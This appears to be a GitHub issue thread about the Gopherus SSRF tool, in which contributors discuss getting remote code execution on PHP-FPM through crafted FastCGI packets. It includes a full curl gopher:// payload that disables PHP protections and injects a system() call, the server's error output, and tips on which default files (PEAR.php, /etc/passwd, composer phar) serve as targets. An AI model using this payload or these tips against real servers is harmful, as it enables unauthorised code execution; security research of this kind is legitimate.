Closed mpchadwick closed 5 years ago
Hey, if we wanted to look the file which doesn't have permissions, then why don't we first get the RCE through default file location and then try to read the file you want or find the files you want.
@tarunkant what I'm suggesting is that the payload be updated to clear the security.limit_extensions directive.
I believe doing this would remove the requirement to know the location of a .php file on the system.
I've been trying to understand how to edit FastCGI.py to send that directive, but can't figure out how to do it and ensure the FastCGI packets are still valid.
If if helps I mean something like this:
https://github.com/tarunkant/Gopherus/commit/908d138d149a129f04d239e7d638a5d918124208
Hmm I figured out the FCGI_PARAMS format however it turns out I was mistaken. PHP-FPM will not allow you to set the directive this way...
curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0C%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH63%0E%04REQUEST_METHODPOST%09hPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asecurity.limit_extensions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%02SCRIPT_FILENAMEls%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%3F%04%00%3C%3Fphp%20system%28%27/etc/passwd%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
hPassing INI directive through FastCGI: unable to set 'security.limit_extensions'
Primary script unknown
kStatus: 404 Not Found
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8
File not found.
no-%
Hey, your payload is incorrect because in the place of FILE_NAME you wrote ls
and in the place of COMMAND you wrote /etc/passwd
.
And are we able to unable security.limit_extensions
(I think no)?
Btw, you can put the file name /etc/passwd
, but it's preferable to put .php
extension file(btw, I did put one default file, which will be there always if PHP is installed).
@tarunkant thanks for all the follow up here. Just to note, it's not true that /usr/share/php/PEAR.php
will always be present (which is why I was seeing it's it's possible to use a file that isn't .php by modifying the security.limit_extensions
directive)
[vagrant@localhost magento-1-14-4-0-ee]$ stat /usr/share/php/PEAR.php
stat: cannot stat ‘/usr/share/php/PEAR.php’: No such file or directory
[vagrant@localhost magento-1-14-4-0-ee]$ which php
/usr/bin/php
Unfortunately, as far as I can tell PHP-FPM does not allow changing security.limit_extensions
this way.
Turns out the file is present on my system, just in a slightly different location.
/usr/share/pear/PEAR.php
Cool, you can also check with /etc/passwd
, it will work.
You're right. It does work for me.
There's a good chance of finding phar files in standard locations according to their installation guides.
E.g.
Currently I get error below when trying to use with
/usr/local/bin/composer